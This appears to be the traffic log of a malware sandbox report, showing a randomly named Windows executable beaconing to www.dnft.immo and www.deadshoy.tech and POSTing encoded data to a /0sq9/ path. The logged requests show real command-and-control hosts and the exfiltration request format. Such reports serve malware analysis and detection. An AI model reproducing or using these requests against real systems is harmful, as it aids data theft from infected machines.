                                                      Data Ascii: aPAJTIUwkNvS2l4l9mbVZVyixdN/jFp8YMY8LNzv4ngzmsr4Sm2KiozRG0XXRSYpzp25t9btyR3Dc3VoE3mth2hpkEqHiMk1+2WpRhCjrwB8znRorHEqJyljy605k9SsKHjtq7h2Qjwth6i39fdoj1W70YHV/YI81h1BVJgAs8Av6btejdytDIYq7ZaYPsdIiLaP73GM2s6tVarHdzPT9rNY4Qayim2hXs8zI4PlhpidMHMQC7r
                                                      Dec 13, 2024 13:19:04.597167969 CET1194OUTData Raw: 48 49 6f 38 45 66 31 36 4d 4a 6e 56 62 61 6c 6a 46 73 6a 6b 51 44 4a 67 73 54 46 58 54 5a 77 4b 4b 5a 44 47 62 46 72 75 32 56 37 32 49 53 6e 6c 51 41 44 66 58 4a 38 55 34 4b 44 6c 5a 62 4a 71 43 77 57 4c 6e 54 44 55 46 5a 4d 67 63 44 43 5a 74 75
                                                      Data Ascii: HIo8Ef16MJnVbaljFsjkQDJgsTFXTZwKKZDGbFru2V72ISnlQADfXJ8U4KDlZbJqCwWLnTDUFZMgcDCZtu/Tvn7DyzltUj5DtAJrBjGv51+7AVd89WeO96BqcZcQk3iMu0oJDCqOKDTQzGTM9wJs+92ECk9JObq54IYrhhZ42MGZn9/9IJAqGOprAx0+lq9F7YY9wsi1eTCuSaIcQc94oXMkbvzNnnkcVR54taubg3Ry5+rIqQ2
                                                      Dec 13, 2024 13:19:05.742974997 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:05 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1102
                                                      x-request-id: f88236cc-1fca-48bd-be0b-4c28b2d52156
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                      set-cookie: parking_session=f88236cc-1fca-48bd-be0b-4c28b2d52156; expires=Fri, 13 Dec 2024 12:34:05 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:05.743029118 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjg4MjM2Y2MtMWZjYS00OGJkLWJlMGItNGMyOGIyZDUyMTU2IiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.2449796199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:07.058255911 CET437OUTGET /yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.dnft.immo
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:19:08.143765926 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:07 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1438
                                                      x-request-id: e7cbbf35-f647-4888-88bb-9fe0e65786f0
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_L4jbO3WkqX7Vm7AM1lyL069PDUzMhByunrpJeLj72Z5zq1PSzqnvLFAWyWF4edeDWr48K9cZjp3vgxfpJkj29w==
                                                      set-cookie: parking_session=e7cbbf35-f647-4888-88bb-9fe0e65786f0; expires=Fri, 13 Dec 2024 12:34:07 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 34 6a 62 4f 33 57 6b 71 58 37 56 6d 37 41 4d 31 6c 79 4c 30 36 39 50 44 55 7a 4d 68 42 79 75 6e 72 70 4a 65 4c 6a 37 32 5a 35 7a 71 31 50 53 7a 71 6e 76 4c 46 41 57 79 57 46 34 65 64 65 44 57 72 34 38 4b 39 63 5a 6a 70 33 76 67 78 66 70 4a 6b 6a 32 39 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_L4jbO3WkqX7Vm7AM1lyL069PDUzMhByunrpJeLj72Z5zq1PSzqnvLFAWyWF4edeDWr48K9cZjp3vgxfpJkj29w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:08.143809080 CET891INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTdjYmJmMzUtZjY0Ny00ODg4LTg4YmItOWZlMGU2NTc4NmYwIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.2449797199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:14.020610094 CET713OUTPOST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 39 6c 51 6a 31 4a 44 2b 75 77 59 38 38 64 7a 6e 5a 50 37 63 66 56 71 6e 62 4b 73 75 59 6a 67 74 56 69 4d 69 76 67 71 39 6a 39 42 33 61 64 72 48 49 4f 55 4f 2b 30 59 36 57 6a 4b 4f 59 4b 7a 68 4c 34 5a 75 2b 75 36 52 37 33 6d 6e 46 34 4c 51 4c 76 69 52 6b 47 32 36 4f 6e 77 45 6a 75 69 6b 76 4a 72 49 31 71 53 34 44 39 69 77 2b 65 57 70 6c 56 6c 72 58 62 71 53 2b 68 34 59 64 2b 4c 31 67 73 6c 31 6c 75 45 42 55 78 69 65 37 69 4c 75 4b 38 65 42 65 6c 50 53 62 66 34 7a 53 7a 47 64 6f 51 78 76 7a 73 6e 4a 65 42 61 32 2f 68 63 6a 2b 66 4d 74 4a 51 3d 3d
                                                      Data Ascii: BTV4RR_=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6WjKOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1luEBUxie7iLuK8eBelPSbf4zSzGdoQxvzsnJeBa2/hcj+fMtJQ==
                                                      Dec 13, 2024 13:19:15.100106955 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:14 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 9846122a-ba1b-4b9d-a212-ab4e3bd1f313
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=9846122a-ba1b-4b9d-a212-ab4e3bd1f313; expires=Fri, 13 Dec 2024 12:34:14 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:15.100208044 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTg0NjEyMmEtYmExYi00YjlkLWEyMTItYWI0ZTNiZDFmMzEzIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.2449799199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:16.684420109 CET1085OUTPOST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 49 74 4d 48 6f 69 67 42 71 39 6d 39 42 33 55 39 72 43 46 75 55 4a 2b 30 63 49 57 6d 79 4f 59 4b 6e 68 4b 50 74 75 35 4f 36 53 2f 58 6d 69 54 6f 4c 62 52 66 69 49 6b 47 32 59 4f 6e 78 63 6a 72 2b 6b 6f 49 4c 49 6a 76 2b 34 44 39 69 36 68 75 57 32 33 6c 6c 4b 58 62 79 34 2b 6b 51 49 64 34 4c 31 67 4d 46 31 7a 75 45 4f 57 52 69 53 6a 79 4b 37 61 2b 72 37 65 47 6e 45 55 73 46 49 54 54 4c 39 69 41 52 31 2b 65 33 69 61 54 6e 58 34 55 4a 4c 72 4f 52 52 62 34 35 36 30 64 33 50 2b 6d 56 32 79 36 59 32 35 36 44 44 69 72 43 5a 33 53 67 6d 4b 2b 63 78 66 57 61 30 4a 56 67 58 6e 56 43 69 2f 68 68 6c 63 31 45 36 4c 38 4c 61 36 45 74 78 64 66 52 35 4e 35 41 71 4f 6b 59 50 51 6d 58 32 48 53 67 7a 79 49 6a 52 30 79 43 78 76 78 39 73 61 6f 70 38 32 39 70 69 75 42 67 79 35 31 59 51 6c 49 65 6f 6f 46 33 71 66 2b 68 51 2b 69 6e 53 5a 4b 4e 30 68 43 35 57 2b 6b 54 75 66 41 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVItMHoigBq9m9B3U9rCFuUJ+0cIWmyOYKnhKPtu5O6S/XmiToLbRfiIkG2YOnxcjr+koILIjv+4D9i6huW23llKXby4+kQId4L1gMF1zuEOWRiSjyK7a+r7eGnEUsFITTL9iAR1+e3iaTnX4UJLrORRb4560d3P+mV2y6Y256DDirCZ3SgmK+cxfWa0JVgXnVCi/hhlc1E6L8La6EtxdfR5N5AqOkYPQmX2HSgzyIjR0yCxvx9saop829piuBgy51YQlIeooF3qf+hQ+inSZKN0hC5W+kTufAmpC8XiImQhMg6kQD2211/RdbK+s3ymtmjyNqfJyHnCfZmRtCc0fbyHR171JSFxAJucq0s+irA7BegTxv8oVpO/QmXUip2JmXX4iNW404ygtyXS9aQwgpNruYG//1c3P6MPd+92RVZnBTh4WAk930HqYft4HjiUiXg7+y3GDSNNV6g68YQM/v/4BDW47CBJEbCpshqgRzin/dHm/P36dxSygI9uKnsVCbqoeVoYVNRL08I=
                                                      Dec 13, 2024 13:19:17.765785933 CET1236INHTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:17 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 7f92b2f9-1870-4a12-9ad4-0b968bec2821
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=7f92b2f9-1870-4a12-9ad4-0b968bec2821; expires=Fri, 13 Dec 2024 12:34:17 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                      Dec 13, 2024 13:19:17.765820026 CET571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y5MmIyZjktMTg3MC00YTEyLTlhZDQtMGI5NjhiZWMyODIxIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.2449801199.59.243.227806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:19:19.491897106 CET12360OUTPOST /0sq9/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.deadshoy.tech
                                                      Origin: http://www.deadshoy.tech
                                                      Referer: http://www.deadshoy.tech/0sq9/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 39 42 45 4d 67 54 6a 6d 69 2b 41 36 2f 47 49 6a 30 72 72 2b 2f 51 59 7a 77 39 7a 6e 57 76 37 51 66 56 57 6e 62 4f 31 72 66 56 77 74 51 6b 51 69 76 43 53 39 68 39 42 33 63 64 72 44 46 75 55 59 2b 77 77 4d 57 6d 33 37 59 49 66 68 4b 66 64 75 34 72 75 53 76 33 6d 68 53 6f 4c 52 4c 76 69 45 6b 47 47 2b 4f 6e 31 4d 6a 76 47 6b 75 36 54 49 6b 71 53 37 4a 64 69 77 2b 65 57 74 6c 56 6c 54 58 62 69 30 2b 6c 77 49 64 49 50 31 67 4f 39 31 6e 50 45 4f 57 78 69 53 6c 79 4c 2f 42 4f 33 47 65 47 6e 59 55 73 52 79 53 68 7a 39 6a 53 70 31 33 75 33 68 52 44 6e 52 37 55 4a 4a 36 65 52 57 62 34 68 36 30 59 54 50 2b 55 56 32 79 62 34 32 36 61 44 41 35 37 43 5a 38 79 67 6b 48 65 51 55 66 57 61 38 4a 55 31 79 6e 56 47 69 2b 41 68 6c 4b 55 45 37 63 4d 4c 5a 39 45 74 33 54 2f 52 76 4e 2b 49 59 4f 6b 51 50 58 53 50 32 48 42 34 7a 6b 37 62 53 79 69 43 38 6c 52 39 71 54 49 6b 51 32 39 52 6d 75 42 41 69 35 45 34 51 6c 4d 61 6f 73 47 76 71 49 2b 68 51 75 53 6e 55 58 71 4e 73 68 43 35 57 2b 6b 66 75 65 33 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=9BEMgTjmi+A6/GIj0rr+/QYzw9znWv7QfVWnbO1rfVwtQkQivCS9h9B3cdrDFuUY+wwMWm37YIfhKfdu4ruSv3mhSoLRLviEkGG+On1MjvGku6TIkqS7Jdiw+eWtlVlTXbi0+lwIdIP1gO91nPEOWxiSlyL/BO3GeGnYUsRyShz9jSp13u3hRDnR7UJJ6eRWb4h60YTP+UV2yb426aDA57CZ8ygkHeQUfWa8JU1ynVGi+AhlKUE7cMLZ9Et3T/RvN+IYOkQPXSP2HB4zk7bSyiC8lR9qTIkQ29RmuBAi5E4QlMaosGvqI+hQuSnUXqNshC5W+kfue3mpDu/iZFIgCw6mcj2v117Mdfqms2z7sXfyNZXJ20DFLJma6yd1bb+WR0WIJXtxA8mcrFs+mY40I+gfzv82YJPGQgKhioTsmmr4iMm404ygtyXQw6QKgpNnuYGZ/1ENP6UPd912RWxkHzh1fgkNskHhYf0FHiSEiFA7/D3GTCM/Kag+8YRKi//BBDCw7CJZHv2pshagB3uFl7Paj8vRfyGZjJpqMEIbf7q7LywVOeALgYwvYXuUuTiZFyYCtlWWJa1Bq/nq2qk/upitMTchO57ks6LODfIlq6HvzSH+RJKoHoYCh8lEAhhybqYkM7j0Wp65gN6j5ZIDxDB+zU8PSygl67RB/KDjK7VA6Xss6IhAn4ZoEK6ngmSAiUsbNZm+bHJV0SOG+yMCMQG6v6FlAv2vXyNrLiEQBp214n54IGQ/G6Ge/XItQoN8ssvAOVSbIX3bmpBHQlJhjEVBo1ZMDQyJYOXMn9qbN0/5sVuQvNC1tgmQBKHif+s4Vgyc4Wzvapu1oYsohuvl4i8uenuEdr+g8QwfpSF+tJdYUhNEgycofHADfEByAmNNfExIODMh4ncDOoV1E2Fs7RalmwgRDEYJIOdWzjIc55CyWghsoiPWOPmXKkSfBkSVeD63UrT+ixfWVwJWF8kR7ECFjNn6skt6cAvJ87hGicS5 [TRUNCATED]
